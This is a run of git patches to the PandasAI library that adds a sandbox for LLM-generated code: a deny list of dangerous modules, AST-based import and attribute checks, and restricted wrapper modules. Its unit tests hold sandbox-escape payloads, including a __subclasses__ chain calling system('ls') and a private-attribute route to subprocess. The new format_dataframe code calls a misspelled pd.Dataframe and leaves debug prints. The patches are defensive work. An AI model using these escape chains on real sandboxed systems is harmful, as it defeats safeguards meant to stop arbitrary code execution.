From 437f9498df042fabd448d3c03b0cb63a8d58a870 Mon Sep 17 00:00:00 2001
From: Arslan Saleem
Date: Mon, 18 Nov 2024 14:35:19 +0100
Subject: [PATCH 07/58] =?UTF-8?q?fix[output=5Fformat]:=20accept=20datafram?=
=?UTF-8?q?e=20dict=20as=20output=20and=20secure=20sql=20qu=E2=80=A6=20(#1?=
=?UTF-8?q?432)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
* fix[output_format]: accept dataframe dict as output and secure sql query execution
* fix: ruff errors
---
pandasai/connectors/sql.py | 2 +-
pandasai/helpers/output_validator.py | 4 ++--
pandasai/responses/response_parser.py | 12 ++++++++++++
3 files changed, 15 insertions(+), 3 deletions(-)
diff --git a/pandasai/connectors/sql.py b/pandasai/connectors/sql.py
index e1494ba59..68638e8a2 100644
--- a/pandasai/connectors/sql.py
+++ b/pandasai/connectors/sql.py
@@ -441,7 +441,7 @@ def execute_direct_sql_query(self, sql_query):
if not self._is_sql_query_safe(sql_query):
raise MaliciousQueryError("Malicious query is generated in code")
- return pd.read_sql(sql_query, self._connection)
+ return pd.read_sql(text(sql_query), self._connection)
@property
def cs_table_name(self):
diff --git a/pandasai/helpers/output_validator.py b/pandasai/helpers/output_validator.py
index e26bcf2ff..56a3a495d 100644
--- a/pandasai/helpers/output_validator.py
+++ b/pandasai/helpers/output_validator.py
@@ -56,7 +56,7 @@ def validate_value(self, expected_type: str) -> bool:
elif expected_type == "string":
return isinstance(self, str)
elif expected_type == "dataframe":
- return isinstance(self, (pd.DataFrame, pd.Series))
+ return isinstance(self, (pd.DataFrame, pd.Series, dict))
elif expected_type == "plot":
if not isinstance(self, (str, dict)):
return False
@@ -82,7 +82,7 @@ def validate_result(result: dict) -> bool:
elif result["type"] == "string":
return isinstance(result["value"], str)
elif result["type"] == "dataframe":
- return isinstance(result["value"], (pd.DataFrame, pd.Series))
+ return isinstance(result["value"], (pd.DataFrame, pd.Series, dict))
elif result["type"] == "plot":
if "plotly" in repr(type(result["value"])):
return True
diff --git a/pandasai/responses/response_parser.py b/pandasai/responses/response_parser.py
index fd202784d..4254c77ec 100644
--- a/pandasai/responses/response_parser.py
+++ b/pandasai/responses/response_parser.py
@@ -1,6 +1,7 @@
from abc import ABC, abstractmethod
from typing import Any
+import pandas as pd
from PIL import Image
from pandasai.exceptions import MethodNotImplementedError
@@ -51,9 +52,20 @@ def parse(self, result: dict) -> Any:
if result["type"] == "plot":
return self.format_plot(result)
+ elif result["type"] == "dataframe":
+ return self.format_dataframe(result)
else:
return result["value"]
+ def format_dataframe(self, result: dict) -> Any:
+ if isinstance(result["value"], dict):
+ print("Df conversiont")
+ df = pd.Dataframe(result["value"])
+ print("Df conversiont Done")
+ result["value"] = df
+
+ return result["value"]
+
def format_plot(self, result: dict) -> Any:
"""
Display matplotlib plot against a user query.
From 27cb449572d05597a10dbdd691fe3acf7a6945a8 Mon Sep 17 00:00:00 2001
From: Arslan Saleem
Date: Wed, 20 Nov 2024 11:29:13 +0100
Subject: [PATCH 08/58] chore[Security]: restrict libs to allow specific
functionalities (#1429)
* chore[Security]: restrict libs to allow specific functionalities
* remove: extra lib handling
* fix: ruff errors
* fix: error message for bad import
* fix: add io library in the blacklist
---
pandasai/constants.py | 32 ++-
pandasai/helpers/optional.py | 34 +++-
pandasai/pipelines/chat/code_cleaning.py | 63 +++++-
pandasai/safe_libs/base_restricted_module.py | 27 +++
pandasai/safe_libs/restricted_base64.py | 21 ++
pandasai/safe_libs/restricted_datetime.py | 64 ++++++
pandasai/safe_libs/restricted_json.py | 23 +++
pandasai/safe_libs/restricted_matplotlib.py | 76 ++++++++
pandasai/safe_libs/restricted_numpy.py | 182 ++++++++++++++++++
pandasai/safe_libs/restricted_pandas.py | 110 +++++++++++
pandasai/safe_libs/restricted_seaborn.py | 74 +++++++
.../smart_datalake/test_code_cleaning.py | 60 ++++--
12 files changed, 731 insertions(+), 35 deletions(-)
create mode 100644 pandasai/safe_libs/base_restricted_module.py
create mode 100644 pandasai/safe_libs/restricted_base64.py
create mode 100644 pandasai/safe_libs/restricted_datetime.py
create mode 100644 pandasai/safe_libs/restricted_json.py
create mode 100644 pandasai/safe_libs/restricted_matplotlib.py
create mode 100644 pandasai/safe_libs/restricted_numpy.py
create mode 100644 pandasai/safe_libs/restricted_pandas.py
create mode 100644 pandasai/safe_libs/restricted_seaborn.py
diff --git a/pandasai/constants.py b/pandasai/constants.py
index bf0734547..43dccbd4e 100644
--- a/pandasai/constants.py
+++ b/pandasai/constants.py
@@ -85,21 +85,35 @@
# List of Python packages that are whitelisted for import in generated code
WHITELISTED_LIBRARIES = [
- "sklearn",
- "statsmodels",
"seaborn",
- "plotly",
- "ggplot",
"matplotlib",
"numpy",
"datetime",
"json",
- "io",
"base64",
- "scipy",
- "streamlit",
- "modin",
- "scikit-learn",
+ "pandas",
+]
+
+# List of restricted libs
+RESTRICTED_LIBS = [
+ "os", # OS-level operations (file handling, environment variables)
+ "sys", # System-level access
+ "subprocess", # Run system commands
+ "shutil", # File operations, including delete
+ "multiprocessing", # Spawn new processes
+ "threading", # Thread-level operations
+ "socket", # Network connections
+ "http", # HTTP requests
+ "ftplib", # FTP connections
+ "paramiko", # SSH operations
+ "tempfile", # Create temporary files
+ "pathlib", # Filesystem path handling
+ "resource", # Access resource usage limits (system-related)
+ "ssl", # SSL socket connections
+ "pickle", # Unsafe object serialization
+ "ctypes", # C-level interaction with memory
+ "psutil", # System and process utilities
+ "io",
]
PANDASBI_SETUP_MESSAGE = (
diff --git a/pandasai/helpers/optional.py b/pandasai/helpers/optional.py
index 37ccd87ee..f1d7a830a 100644
--- a/pandasai/helpers/optional.py
+++ b/pandasai/helpers/optional.py
@@ -10,12 +10,16 @@
import warnings
from typing import TYPE_CHECKING, List
-import matplotlib.pyplot as plt
-import numpy as np
from pandas.util.version import Version
-import pandasai.pandas as pd
from pandasai.constants import WHITELISTED_BUILTINS
+from pandasai.safe_libs.restricted_base64 import RestrictedBase64
+from pandasai.safe_libs.restricted_datetime import RestrictedDatetime
+from pandasai.safe_libs.restricted_json import RestrictedJson
+from pandasai.safe_libs.restricted_matplotlib import RestrictedMatplotlib
+from pandasai.safe_libs.restricted_numpy import RestrictedNumpy
+from pandasai.safe_libs.restricted_pandas import RestrictedPandas
+from pandasai.safe_libs.restricted_seaborn import RestrictedSeaborn
if TYPE_CHECKING:
import types
@@ -54,10 +58,7 @@ def get_environment(additional_deps: List[dict]) -> dict:
Returns (dict): A dictionary of environment variables
"""
- return {
- "pd": pd,
- "plt": plt,
- "np": np,
+ env = {
**{
lib["alias"]: (
getattr(import_dependency(lib["module"]), lib["name"])
@@ -73,6 +74,25 @@ def get_environment(additional_deps: List[dict]) -> dict:
},
}
+ env["pd"] = RestrictedPandas()
+ env["plt"] = RestrictedMatplotlib()
+ env["np"] = RestrictedNumpy()
+
+ for lib in additional_deps:
+ if lib["name"] == "seaborn":
+ env["sns"] = RestrictedSeaborn()
+
+ if lib["name"] == "datetime":
+ env["datetime"] = RestrictedDatetime()
+
+ if lib["name"] == "json":
+ env["json"] = RestrictedJson()
+
+ if lib["name"] == "base64":
+ env["base64"] = RestrictedBase64()
+
+ return env
+
def import_dependency(
name: str,
diff --git a/pandasai/pipelines/chat/code_cleaning.py b/pandasai/pipelines/chat/code_cleaning.py
index 3effcaed0..5e86975df 100644
--- a/pandasai/pipelines/chat/code_cleaning.py
+++ b/pandasai/pipelines/chat/code_cleaning.py
@@ -15,7 +15,7 @@
from ...connectors import BaseConnector
from ...connectors.sql import SQLConnector
-from ...constants import WHITELISTED_BUILTINS, WHITELISTED_LIBRARIES
+from ...constants import RESTRICTED_LIBS, WHITELISTED_LIBRARIES
from ...exceptions import (
BadImportError,
ExecuteSQLQueryNotUsed,
@@ -161,6 +161,58 @@ def get_code_to_run(self, code: str, context: CodeExecutionContext) -> Any:
return code_to_run
def _is_malicious_code(self, code) -> bool:
+ tree = ast.parse(code)
+
+ # Check for private attributes and access of restricted libs
+ def check_restricted_access(node):
+ """Check if the node accesses restricted modules or private attributes."""
+ if isinstance(node, ast.Attribute):
+ attr_chain = []
+ while isinstance(node, ast.Attribute):
+ if node.attr.startswith("_"):
+ raise MaliciousQueryError(
+ f"Access to private attribute '{node.attr}' is not allowed."
+ )
+ attr_chain.insert(0, node.attr)
+ node = node.value
+ if isinstance(node, ast.Name):
+ attr_chain.insert(0, node.id)
+ if any(module in RESTRICTED_LIBS for module in attr_chain):
+ raise MaliciousQueryError(
+ f"Restricted access detected in attribute chain: {'.'.join(attr_chain)}"
+ )
+
+ elif isinstance(node, ast.Subscript) and isinstance(
+ node.value, ast.Attribute
+ ):
+ check_restricted_access(node.value)
+
+ for node in ast.walk(tree):
+ # Check 'import ...' statements
+ if isinstance(node, ast.Import):
+ for alias in node.names:
+ sub_module_names = alias.name.split(".")
+ if any(module in RESTRICTED_LIBS for module in sub_module_names):
+ raise MaliciousQueryError(
+ f"Restricted library import detected: {alias.name}"
+ )
+
+ # Check 'from ... import ...' statements
+ elif isinstance(node, ast.ImportFrom):
+ sub_module_names = node.module.split(".")
+ if any(module in RESTRICTED_LIBS for module in sub_module_names):
+ raise MaliciousQueryError(
+ f"Restricted library import detected: {node.module}"
+ )
+ if any(alias.name in RESTRICTED_LIBS for alias in node.names):
+ raise MaliciousQueryError(
+ "Restricted library import detected in 'from ... import ...'"
+ )
+
+ # Check attribute access for restricted libraries
+ elif isinstance(node, (ast.Attribute, ast.Subscript)):
+ check_restricted_access(node)
+
dangerous_modules = [
" os",
" io",
@@ -176,6 +228,7 @@ def _is_malicious_code(self, code) -> bool:
"(chr",
"b64decode",
]
+
return any(
re.search(r"\b" + re.escape(module) + r"\b", code)
for module in dangerous_modules
@@ -584,5 +637,9 @@ def _check_imports(self, node: Union[ast.Import, ast.ImportFrom]):
)
return
- if library not in WHITELISTED_BUILTINS:
- raise BadImportError(library)
+ if library not in WHITELISTED_LIBRARIES:
+ raise BadImportError(
+ f"The library '{library}' is not in the list of whitelisted libraries. "
+ "To learn how to whitelist custom dependencies, visit: "
+ "https://docs.pandas-ai.com/custom-whitelisted-dependencies#custom-whitelisted-dependencies"
+ )
diff --git a/pandasai/safe_libs/base_restricted_module.py b/pandasai/safe_libs/base_restricted_module.py
new file mode 100644
index 000000000..3067a3aab
--- /dev/null
+++ b/pandasai/safe_libs/base_restricted_module.py
@@ -0,0 +1,27 @@
+class BaseRestrictedModule:
+ def _wrap_function(self, func):
+ def wrapper(*args, **kwargs):
+ # Check for any suspicious arguments that might be used for importing
+ for arg in args + tuple(kwargs.values()):
+ if isinstance(arg, str) and any(
+ module in arg.lower()
+ for module in ["io", "os", "subprocess", "sys", "importlib"]
+ ):
+ raise SecurityError(
+ f"Potential security risk: '{arg}' is not allowed"
+ )
+ return func(*args, **kwargs)
+
+ return wrapper
+
+ def _wrap_class(self, cls):
+ class WrappedClass(cls):
+ def __getattribute__(self, name):
+ attr = super().__getattribute__(name)
+ return self._wrap_function(self, attr) if callable(attr) else attr
+
+ return WrappedClass
+
+
+class SecurityError(Exception):
+ pass
diff --git a/pandasai/safe_libs/restricted_base64.py b/pandasai/safe_libs/restricted_base64.py
new file mode 100644
index 000000000..eb305885e
--- /dev/null
+++ b/pandasai/safe_libs/restricted_base64.py
@@ -0,0 +1,21 @@
+import base64
+
+from .base_restricted_module import BaseRestrictedModule
+
+
+class RestrictedBase64(BaseRestrictedModule):
+ def __init__(self):
+ self.allowed_functions = [
+ "b64encode", # Safe function to encode data into base64
+ "b64decode", # Safe function to decode base64 encoded data
+ ]
+
+ # Bind the allowed functions to the object
+ for func in self.allowed_functions:
+ if hasattr(base64, func):
+ setattr(self, func, self._wrap_function(getattr(base64, func)))
+
+ def __getattr__(self, name):
+ if name not in self.allowed_functions:
+ raise AttributeError(f"'{name}' is not allowed in RestrictedBase64")
+ return getattr(base64, name)
diff --git a/pandasai/safe_libs/restricted_datetime.py b/pandasai/safe_libs/restricted_datetime.py
new file mode 100644
index 000000000..0fc48290a
--- /dev/null
+++ b/pandasai/safe_libs/restricted_datetime.py
@@ -0,0 +1,64 @@
+import datetime
+
+from .base_restricted_module import BaseRestrictedModule
+
+
+class RestrictedDatetime(BaseRestrictedModule):
+ def __init__(self):
+ self.allowed_attributes = [
+ # Classes
+ "date",
+ "time",
+ "datetime",
+ "timedelta",
+ "tzinfo",
+ "timezone",
+ # Constants
+ "MINYEAR",
+ "MAXYEAR",
+ # Time zone constants
+ "UTC",
+ # Functions
+ "now",
+ "utcnow",
+ "today",
+ "fromtimestamp",
+ "utcfromtimestamp",
+ "fromordinal",
+ "combine",
+ "strptime",
+ # Timedelta operations
+ "timedelta",
+ # Date operations
+ "weekday",
+ "isoweekday",
+ "isocalendar",
+ "isoformat",
+ "ctime",
+ "strftime",
+ "year",
+ "month",
+ "day",
+ "hour",
+ "minute",
+ "second",
+ "microsecond",
+ # Time operations
+ "replace",
+ "tzname",
+ "dst",
+ "utcoffset",
+ # Comparison methods
+ "min",
+ "max",
+ ]
+
+ for attr in self.allowed_attributes:
+ if hasattr(datetime, attr):
+ setattr(self, attr, self._wrap_function(getattr(datetime, attr)))
+
+ def __getattr__(self, name):
+ if name not in self.allowed_attributes:
+ raise AttributeError(f"'{name}' is not allowed in RestrictedDatetime")
+
+ return getattr(datetime, name)
diff --git a/pandasai/safe_libs/restricted_json.py b/pandasai/safe_libs/restricted_json.py
new file mode 100644
index 000000000..7f13b6112
--- /dev/null
+++ b/pandasai/safe_libs/restricted_json.py
@@ -0,0 +1,23 @@
+import json
+
+from .base_restricted_module import BaseRestrictedModule
+
+
+class RestrictedJson(BaseRestrictedModule):
+ def __init__(self):
+ self.allowed_functions = [
+ "load",
+ "loads",
+ "dump",
+ "dumps",
+ ]
+
+ # Bind the allowed functions to the object
+ for func in self.allowed_functions:
+ if hasattr(json, func):
+ setattr(self, func, self._wrap_function(getattr(json, func)))
+
+ def __getattr__(self, name):
+ if name not in self.allowed_functions:
+ raise AttributeError(f"'{name}' is not allowed in RestrictedJson")
+ return getattr(json, name)
diff --git a/pandasai/safe_libs/restricted_matplotlib.py b/pandasai/safe_libs/restricted_matplotlib.py
new file mode 100644
index 000000000..82635bfda
--- /dev/null
+++ b/pandasai/safe_libs/restricted_matplotlib.py
@@ -0,0 +1,76 @@
+import matplotlib.axes as axes
+import matplotlib.figure as figure
+import matplotlib.pyplot as plt
+
+from .base_restricted_module import BaseRestrictedModule
+
+
+class RestrictedMatplotlib(BaseRestrictedModule):
+ def __init__(self):
+ self.allowed_attributes = [
+ # Figure and Axes creation
+ "figure",
+ "subplots",
+ "subplot",
+ # Plotting functions
+ "plot",
+ "scatter",
+ "bar",
+ "barh",
+ "hist",
+ "boxplot",
+ "violinplot",
+ "pie",
+ "errorbar",
+ "contour",
+ "contourf",
+ "imshow",
+ "pcolor",
+ "pcolormesh",
+ # Axis manipulation
+ "xlabel",
+ "ylabel",
+ "title",
+ "legend",
+ "xlim",
+ "ylim",
+ "axis",
+ "xticks",
+ "yticks",
+ "grid",
+ "axhline",
+ "axvline",
+ # Colorbar
+ "colorbar",
+ # Text and annotations
+ "text",
+ "annotate",
+ # Styling
+ "style",
+ # Save and show
+ "show",
+ "savefig",
+ # Color maps
+ "get_cmap",
+ # 3D plotting
+ "axes3d",
+ # Utility functions
+ "close",
+ "clf",
+ "cla",
+ # Constants
+ "rcParams",
+ ]
+
+ for attr in self.allowed_attributes:
+ if hasattr(plt, attr):
+ setattr(self, attr, self._wrap_function(getattr(plt, attr)))
+
+ # Special handling for figure and axes
+ self.Figure = self._wrap_class(figure.Figure)
+ self.Axes = self._wrap_class(axes.Axes)
+
+ def __getattr__(self, name):
+ if name not in self.allowed_attributes:
+ raise AttributeError(f"'{name}' is not allowed in RestrictedMatplotlib")
+ return getattr(plt, name)
diff --git a/pandasai/safe_libs/restricted_numpy.py b/pandasai/safe_libs/restricted_numpy.py
new file mode 100644
index 000000000..855fb70d6
--- /dev/null
+++ b/pandasai/safe_libs/restricted_numpy.py
@@ -0,0 +1,182 @@
+import numpy as np
+
+from .base_restricted_module import BaseRestrictedModule
+
+
+class RestrictedNumpy(BaseRestrictedModule):
+ def __init__(self):
+ self.allowed_attributes = [
+ # Array creation
+ "array",
+ "zeros",
+ "ones",
+ "empty",
+ "full",
+ "zeros_like",
+ "ones_like",
+ "empty_like",
+ "full_like",
+ "eye",
+ "identity",
+ "diag",
+ "arange",
+ "linspace",
+ "logspace",
+ "geomspace",
+ "fromfunction",
+ "fromiter",
+ # Array manipulation
+ "reshape",
+ "ravel",
+ "flatten",
+ "moveaxis",
+ "rollaxis",
+ "swapaxes",
+ "transpose",
+ "split",
+ "hsplit",
+ "vsplit",
+ "dsplit",
+ "stack",
+ "column_stack",
+ "dstack",
+ "row_stack",
+ "concatenate",
+ "vstack",
+ "hstack",
+ "tile",
+ "repeat",
+ # Mathematical operations
+ "add",
+ "subtract",
+ "multiply",
+ "divide",
+ "power",
+ "mod",
+ "remainder",
+ "divmod",
+ "negative",
+ "positive",
+ "absolute",
+ "fabs",
+ "rint",
+ "floor",
+ "ceil",
+ "trunc",
+ "exp",
+ "expm1",
+ "exp2",
+ "log",
+ "log10",
+ "log2",
+ "log1p",
+ "sqrt",
+ "square",
+ "cbrt",
+ "reciprocal",
+ # Trigonometric functions
+ "sin",
+ "cos",
+ "tan",
+ "arcsin",
+ "arccos",
+ "arctan",
+ "arctan2",
+ "hypot",
+ "sinh",
+ "cosh",
+ "tanh",
+ "arcsinh",
+ "arccosh",
+ "arctanh",
+ "deg2rad",
+ "rad2deg",
+ # Statistical functions
+ "mean",
+ "average",
+ "median",
+ "std",
+ "var",
+ "min",
+ "max",
+ "argmin",
+ "argmax",
+ "sum",
+ "prod",
+ "percentile",
+ "quantile",
+ "histogram",
+ "histogram2d",
+ "histogramdd",
+ "bincount",
+ "digitize",
+ # Linear algebra
+ "dot",
+ "vdot",
+ "inner",
+ "outer",
+ "matmul",
+ "tensordot",
+ "einsum",
+ "trace",
+ "diagonal",
+ # Sorting and searching
+ "sort",
+ "argsort",
+ "partition",
+ "argpartition",
+ "searchsorted",
+ "nonzero",
+ "where",
+ "extract",
+ # Logic functions
+ "all",
+ "any",
+ "greater",
+ "greater_equal",
+ "less",
+ "less_equal",
+ "equal",
+ "not_equal",
+ "logical_and",
+ "logical_or",
+ "logical_not",
+ "logical_xor",
+ "isfinite",
+ "isinf",
+ "isnan",
+ "isneginf",
+ "isposinf",
+ # Set operations
+ "unique",
+ "intersect1d",
+ "union1d",
+ "setdiff1d",
+ "setxor1d",
+ # Basic array information
+ "shape",
+ "size",
+ "ndim",
+ "dtype",
+ # Utility functions
+ "clip",
+ "round",
+ "sign",
+ "conj",
+ "real",
+ "imag",
+ "copy",
+ "asarray",
+ "asanyarray",
+ "ascontiguousarray",
+ "asfortranarray",
+ ]
+
+ for attr in self.allowed_attributes:
+ if hasattr(np, attr):
+ setattr(self, attr, self._wrap_function(getattr(np, attr)))
+
+ def __getattr__(self, name):
+ if name not in self.allowed_attributes:
+ raise AttributeError(f"'{name}' is not allowed in RestrictedNumPy")
+ return getattr(np, name)
diff --git a/pandasai/safe_libs/restricted_pandas.py b/pandasai/safe_libs/restricted_pandas.py
new file mode 100644
index 000000000..75e5a083c
--- /dev/null
+++ b/pandasai/safe_libs/restricted_pandas.py
@@ -0,0 +1,110 @@
+import pandas as pd
+
+from .base_restricted_module import BaseRestrictedModule
+
+
+class RestrictedPandas(BaseRestrictedModule):
+ def __init__(self):
+ self.allowed_attributes = [
+ # DataFrame creation and basic operations
+ "DataFrame",
+ "Series",
+ "concat",
+ "merge",
+ "join",
+ # Data manipulation
+ "groupby",
+ "pivot",
+ "pivot_table",
+ "melt",
+ "crosstab",
+ "cut",
+ "qcut",
+ "get_dummies",
+ "factorize",
+ # Indexing and selection
+ "loc",
+ "iloc",
+ "at",
+ "iat",
+ # Function application
+ "apply",
+ "applymap",
+ "pipe",
+ # Reshaping and sorting
+ "sort_values",
+ "sort_index",
+ "nlargest",
+ "nsmallest",
+ "rank",
+ "reindex",
+ "reset_index",
+ "set_index",
+ # Computations / descriptive stats
+ "sum",
+ "prod",
+ "min",
+ "max",
+ "mean",
+ "median",
+ "var",
+ "std",
+ "sem",
+ "skew",
+ "kurt",
+ "quantile",
+ "count",
+ "nunique",
+ "value_counts",
+ "describe",
+ "cov",
+ "corr",
+ # Date functionality
+ "to_datetime",
+ "date_range",
+ # String methods
+ "str",
+ # Categorical methods
+ "Categorical",
+ "cut",
+ "qcut",
+ # Plotting (if visualization is allowed)
+ "plot",
+ # Utility functions
+ "isnull",
+ "notnull",
+ "isna",
+ "notna",
+ "fillna",
+ "dropna",
+ "replace",
+ "astype",
+ "copy",
+ "drop_duplicates",
+ # Window functions
+ "rolling",
+ "expanding",
+ "ewm",
+ # Time series functionality
+ "resample",
+ "shift",
+ "diff",
+ "pct_change",
+ # Aggregation
+ "agg",
+ "aggregate",
+ ]
+
+ for attr in self.allowed_attributes:
+ if hasattr(pd, attr):
+ setattr(self, attr, self._wrap_function(getattr(pd, attr)))
+ elif attr in ["loc", "iloc", "at", "iat"]:
+ # These are properties, not functions
+ setattr(
+ self, attr, property(lambda self, a=attr: getattr(pd.DataFrame, a))
+ )
+
+ def __getattr__(self, name):
+ if name not in self.allowed_attributes:
+ raise AttributeError(f"'{name}' is not allowed in RestrictedPandas")
+ return getattr(pd, name)
diff --git a/pandasai/safe_libs/restricted_seaborn.py b/pandasai/safe_libs/restricted_seaborn.py
new file mode 100644
index 000000000..a5ef4c6e8
--- /dev/null
+++ b/pandasai/safe_libs/restricted_seaborn.py
@@ -0,0 +1,74 @@
+import seaborn as sns
+
+from .base_restricted_module import BaseRestrictedModule
+
+
+class RestrictedSeaborn(BaseRestrictedModule):
+ def __init__(self):
+ self.allowed_attributes = [
+ # Plot functions
+ "scatterplot",
+ "lineplot",
+ "relplot",
+ "displot",
+ "histplot",
+ "kdeplot",
+ "ecdfplot",
+ "rugplot",
+ "distplot",
+ "boxplot",
+ "violinplot",
+ "boxenplot",
+ "stripplot",
+ "swarmplot",
+ "barplot",
+ "countplot",
+ "heatmap",
+ "clustermap",
+ "regplot",
+ "lmplot",
+ "residplot",
+ "jointplot",
+ "pairplot",
+ "catplot",
+ # Axis styling
+ "set_style",
+ "set_context",
+ "set_palette",
+ "despine",
+ "move_legend",
+ "axes_style",
+ "plotting_context",
+ # Color palette functions
+ "color_palette",
+ "palplot",
+ "cubehelix_palette",
+ "light_palette",
+ "dark_palette",
+ "diverging_palette",
+ # Utility functions
+ "load_dataset",
+ # Figure-level interface
+ "FacetGrid",
+ "PairGrid",
+ "JointGrid",
+ # Regression and statistical estimation
+ "lmplot",
+ "regplot",
+ "residplot",
+ # Matrix plots
+ "heatmap",
+ "clustermap",
+ # Miscellaneous
+ "kdeplot",
+ "rugplot",
+ ]
+
+ for attr in self.allowed_attributes:
+ if hasattr(sns, attr):
+ setattr(self, attr, self._wrap_function(getattr(sns, attr)))
+
+ def __getattr__(self, name):
+ if name not in self.allowed_attributes:
+ raise AttributeError(f"'{name}' is not allowed in RestrictedSeaborn")
+ return getattr(sns, name)
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
index 8ccad9efd..49169f373 100644
--- a/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
+++ b/tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
@@ -188,23 +188,17 @@ def test_run_code_invalid_code(
with pytest.raises(Exception):
code_cleaning.execute("1 +", context=context, logger=logger)
- def test_clean_code_remove_builtins(
+ def test_clean_code_raise_not_whitelisted_lib(
self,
code_cleaning: CodeCleaning,
context: PipelineContext,
logger: Logger,
):
- builtins_code = """import set
+ builtins_code = """import scipy
result = {'type': 'number', 'value': set([1, 2, 3])}"""
- output = code_cleaning.execute(builtins_code, context=context, logger=logger)
-
- assert (
- output.output == """result = {'type': 'number', 'value': set([1, 2, 3])}"""
- )
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
+ with pytest.raises(BadImportError):
+ code_cleaning.execute(builtins_code, context=context, logger=logger)
def test_clean_code_removes_jailbreak_code(
self,
@@ -215,12 +209,8 @@ def test_clean_code_removes_jailbreak_code(
malicious_code = """__builtins__['str'].__class__.__mro__[-1].__subclasses__()[140].__init__.__globals__['system']('ls')
print('hello world')"""
- output = code_cleaning.execute(malicious_code, context=context, logger=logger)
-
- assert output.output == """print('hello world')"""
- assert isinstance(output, LogicUnitOutput)
- assert output.success
- assert output.message == "Code Cleaned Successfully"
+ with pytest.raises(MaliciousQueryError):
+ code_cleaning.execute(malicious_code, context=context, logger=logger)
def test_clean_code_remove_environment_defaults(
self,
@@ -900,3 +890,41 @@ def cs_table_name(self):
node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
assert node.value.args[0].value == 'SELECT COUNT(*) AS user_count FROM "Users"'
+
+ def test_clean_code_raise_private_variable_access_error(
+ self,
+ code_cleaning: CodeCleaning,
+ context: PipelineContext,
+ logger: Logger,
+ ):
+ malicious_code = """
+import scipy
+result = {"type": "string", "value": f"{scipy.sparse._sputils.sys.modules['subprocess'].run(['cmd', '/c', 'dir'], text=True, capture_output=True).stdout}"}
+print(result)
+"""
+ with pytest.raises(MaliciousQueryError):
+ code_cleaning.execute(malicious_code, context=context, logger=logger)
+
+ def test_clean_code_raise_import_with_restricted_modules(
+ self,
+ code_cleaning: CodeCleaning,
+ context: PipelineContext,
+ logger: Logger,
+ ):
+ malicious_code = """
+from datetime import sys
+"""
+ with pytest.raises(MaliciousQueryError):
+ code_cleaning.execute(malicious_code, context=context, logger=logger)
+
+ def test_clean_code_raise_import_with_restricted_using_import_statement(
+ self,
+ code_cleaning: CodeCleaning,
+ context: PipelineContext,
+ logger: Logger,
+ ):
+ malicious_code = """
+import datetime.sys as spy
+"""
+ with pytest.raises(MaliciousQueryError):
+ code_cleaning.execute(malicious_code, context=context, logger=logger)
From 0e4e1d0e880621345e06195f195b634670089f6b Mon Sep 17 00:00:00 2001
From: Gabriele Venturi
Date: Wed, 20 Nov 2024 11:41:04 +0100
Subject: [PATCH 09/58] docs: update docs about customer whitelisted
dependencies
---
docs/custom-whitelisted-dependencies.mdx | 26 ++++++++++++++++++++----
1 file changed, 22 insertions(+), 4 deletions(-)
diff --git a/docs/custom-whitelisted-dependencies.mdx b/docs/custom-whitelisted-dependencies.mdx
index 29d9e9b97..0d3c62721 100644
--- a/docs/custom-whitelisted-dependencies.mdx
+++ b/docs/custom-whitelisted-dependencies.mdx
@@ -2,12 +2,30 @@
title: "Custom whitelisted dependencies"
---
-By default, PandasAI only allows to run code that uses some whitelisted modules. This is to prevent malicious code from being executed on the server or locally. However, it is possible to add custom modules to the whitelist. This can be done by passing a list of modules to the `custom_whitelisted_dependencies` parameter when instantiating the `SmartDataframe` or `SmartDatalake` class.
+By default, PandasAI only allows to run code that uses some whitelisted modules. This is to prevent malicious code from being executed on the server or locally.
+
+The whitelisted modules are:
+
+- `pandas`
+- `numpy`
+- `matplotlib`
+- `seaborn`
+- `datetime`
+- `json`
+- `base64`
+
+These libraries are sandboxed for security reasons, so that malicious code cannot be executed on the server or locally.
+
+However, it is possible to add custom modules to the whitelist. This can be done by passing a list of modules to the `custom_whitelisted_dependencies` parameter when instantiating the `Agent` class.
+
+**Note**: PandasAI cannot sandbox arbitrary code execution for custom libraries that are whitelisted. If you add a custom library to the whitelist, arbitrary code execution will be possible for that library. Whitelisting a custom library means that the library is "trusted" and can be used without any limitations. **Only whitelist libraries that are under your control or that you trust**.
+
+For example, to add the `scikit-learn` module to the whitelist:
```python
-from pandasai import SmartDataframe
-df = SmartDataframe("data.csv", config={
- "custom_whitelisted_dependencies": ["seaborn"]
+from pandasai import Agent
+agent = Agent("data.csv", config={
+ "custom_whitelisted_dependencies": ["scikit-learn"]
})
```
From b809841a26d0b71a91d20a65bfcdb0a61e97beea Mon Sep 17 00:00:00 2001
From: Gabriele Venturi
Date: Wed, 20 Nov 2024 20:04:31 +0100
Subject: [PATCH 10/58] Release v2.4.0
---
pyproject.toml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/pyproject.toml b/pyproject.toml
index 2b2a10714..a2697aaa0 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
[tool.poetry]
name = "pandasai"
-version = "2.3.0"
+version = "2.4.0"
description = "Chat with your database (SQL, CSV, pandas, polars, mongodb, noSQL, etc). PandasAI makes data analysis conversational using LLMs (GPT 3.5 / 4, Anthropic, VertexAI) and RAG."
authors = ["Gabriele Venturi"]
license = "MIT"
From 34535a2eee77b07eddf4f77e29528a360f59b52a Mon Sep 17 00:00:00 2001
From: bencekecskes
Date: Wed, 18 Dec 2024 10:09:48 +0100
Subject: [PATCH 11/58] fix: update last_code_generated in smart_dataframe's
__init__.py (#1484)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
In SmartDataframe class the last_code_generated property returned _agent.last_code_executed instead of _agent.last_code_generated. In SmartDatalake it is implemented properly.
Co-authored-by: Bence Kecskés
---
pandasai/smart_dataframe/__init__.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/pandasai/smart_dataframe/__init__.py b/pandasai/smart_dataframe/__init__.py
index 574fbe28e..756c3cbb6 100644
--- a/pandasai/smart_dataframe/__init__.py
+++ b/pandasai/smart_dataframe/__init__.py
@@ -171,7 +171,7 @@ def last_prompt_id(self) -> uuid.UUID:
@property
def last_code_generated(self):
